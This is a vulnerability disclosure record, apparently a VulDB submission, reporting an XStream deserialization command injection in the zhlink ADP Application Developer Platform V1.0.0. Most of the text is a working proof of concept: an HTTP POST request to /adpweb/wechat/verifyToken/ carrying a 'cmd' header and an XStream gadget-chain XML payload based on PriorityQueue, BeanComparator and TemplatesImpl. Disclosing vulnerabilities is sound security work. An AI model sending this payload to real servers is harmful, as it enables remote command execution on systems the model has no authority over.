| Titel | 智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 Command Injection |
|---|
| Beschreibung | 漏洞地址：http://x.x.x.x:8082/adpweb/a/login
漏洞原理：存在 XStream 反序列化漏洞，可导致命令执行；使用如下 POC 可测试命令是否被执行：
POST /adpweb/wechat/verifyToken/ HTTP/1.1
Host: x.x.x.x:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Content-Type: text/xml
cmd: ipconfig
Content-Length: 7407
<java.util.PriorityQueue serialization="custom">
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class="org.apache.commons.beanutils.BeanComparator">
<property>outputProperties</property>
<comparator class="java.lang.String$CaseInsensitiveComparator"/>
</comparator>
</default>
<int>3</int>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>P</__name>
<__bytecodes>
<byte-array>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</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
</java.util.PriorityQueue>
</java.util.PriorityQueue> |
|---|
| Quelle | ⚠️ http://x.x.x.x:8099/adpweb/wechat/verifyToken/ |
|---|
| Benutzer | Id3al (UID 85503) |
|---|
| Einreichung | 20.05.2025 02:55 (vor 11 Monaten) |
|---|
| Moderieren | 29.05.2025 10:34 (9 Tage später) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 310496 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 verifyToken erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|